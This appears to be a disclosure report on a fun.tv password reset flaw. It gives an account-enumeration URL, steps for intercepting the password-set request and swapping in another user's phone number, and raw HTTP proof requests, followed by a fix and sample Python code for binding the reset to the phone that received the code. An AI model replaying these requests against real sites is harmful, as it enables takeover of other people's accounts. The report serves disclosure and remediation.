Password Reset Vulnerability for any user on popular websites
The password reset step is not bound to the mobile phone number that requested and received the verification code. As a result, the password of any account registered with a mobile phone number can be reset.
1. The response of the following URL can be used to enumerate all registered mobile accounts:
http://api1.fun.tv/ajax/get_mobile_vcode/<phone number>/reset_password
For an existing account it returns:
{"status": 200, "msg": "", "url": "", "field": ""}
If the account does not exist, it returns:
{"status": 400, "msg": "wrong mobile", "url": "", "field": ""}
2. Register an account with your own mobile phone number, start password recovery, enter the verification code received by SMS, and click OK to reach the password reset page;
3. Enter a new password, enable Fiddler to intercept the request, and click OK;
POST http://www.fun.tv/account/password/set?isajax=1 HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://www.fun.tv/account/password/setbymobile
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.fun.tv
Content-Length: 71
Connection: Keep-Alive
Pragma: no-cache
...

user_name=<phone number>&passwd=8e93ff85d9b1670&verifypass=8e93ff85d9b1670
4. Replace the phone number in the intercepted request with one obtained in step 1 and resend it. As long as the verification code is still within its validity period, the password of that account is reset.
Proof of vulnerability:
POST http://www.fun.tv/account/password/set?isajax=1 HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://www.fun.tv/account/password/setbymobile
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.fun.tv
Content-Length: 71
Connection: Keep-Alive
Pragma: no-cache

user_name=18612xxxx10&passwd=8e93ff85d9b1670&verifypass=8e93ff85d9b1670

POST http://www.fun.tv/account/password/set?isajax=1 HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://www.fun.tv/account/password/setbymobile
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.fun.tv
Content-Length: 71
Connection: Keep-Alive
Pragma: no-cache

user_name=18612xxx097&passwd=8e93ff85d9b1670&verifypass=8e93ff85d9b1670
Solution:
Expire the verification code once it has been used, and bind the code (and the verified reset state derived from it) to the account it was issued for, so that the account named in the final password-set request must be the same one that received the code.
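As an added example (not code from the report or from the site), the server-side reset flow below implements the fix described above: the SMS code and the reset ticket it is exchanged for are both bound to the phone number that requested them, each is single-use, both expire after CODE_TTL, and the code-request endpoint answers identically for known and unknown numbers. The user table, phone numbers, hashes and the CODE_TTL value are constructed for the demo.

```python
import hashlib
import hmac
import secrets
import time

# Constructed stand-in for the site's user table (example data, not from the report).
USERS = {"13800000001": "old-hash-a", "13800000002": "old-hash-b"}
CODE_TTL = 300  # seconds an SMS code and the reset ticket derived from it stay valid


def hash_password(passwd):
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", passwd.encode(), salt, 200_000)
    return salt.hex() + "$" + digest.hex()


class ResetService:
    """Two-step reset in which the SMS code and the reset ticket are bound to one phone."""

    def __init__(self, now=time.time):
        self.now = now
        self.codes = {}     # phone -> (code, issued_at)
        self.tickets = {}   # ticket -> (phone, issued_at)
        self.sent_sms = []  # (phone, code) pairs an SMS gateway would deliver

    def request_code(self, phone):
        """Step 1: same reply for known and unknown numbers, so nothing is enumerable."""
        if phone in USERS:
            code = f"{secrets.randbelow(10**6):06d}"
            self.codes[phone] = (code, self.now())
            self.sent_sms.append((phone, code))
        return {"status": 200, "msg": ""}

    def verify_code(self, phone, code):
        """Step 2: trade a fresh code for a single-use ticket that remembers its phone."""
        entry = self.codes.pop(phone, None)  # each code is checked at most once
        if entry is None or self.now() - entry[1] > CODE_TTL:
            return None
        if not hmac.compare_digest(entry[0], code):
            return None
        ticket = secrets.token_urlsafe(32)
        self.tickets[ticket] = (phone, self.now())
        return ticket

    def set_password(self, user_name, ticket, passwd):
        """Step 3: user_name must equal the phone the ticket was issued to."""
        entry = self.tickets.pop(ticket, None)  # single use, consumed even on failure
        if entry is None or entry[0] != user_name or self.now() - entry[1] > CODE_TTL:
            return {"status": 400, "msg": "invalid reset ticket"}
        USERS[user_name] = hash_password(passwd)
        return {"status": 200, "msg": ""}
```

Swapping the user_name in step 3 now fails because the ticket carries the phone number it was issued to, which is the check the reported flow lacked.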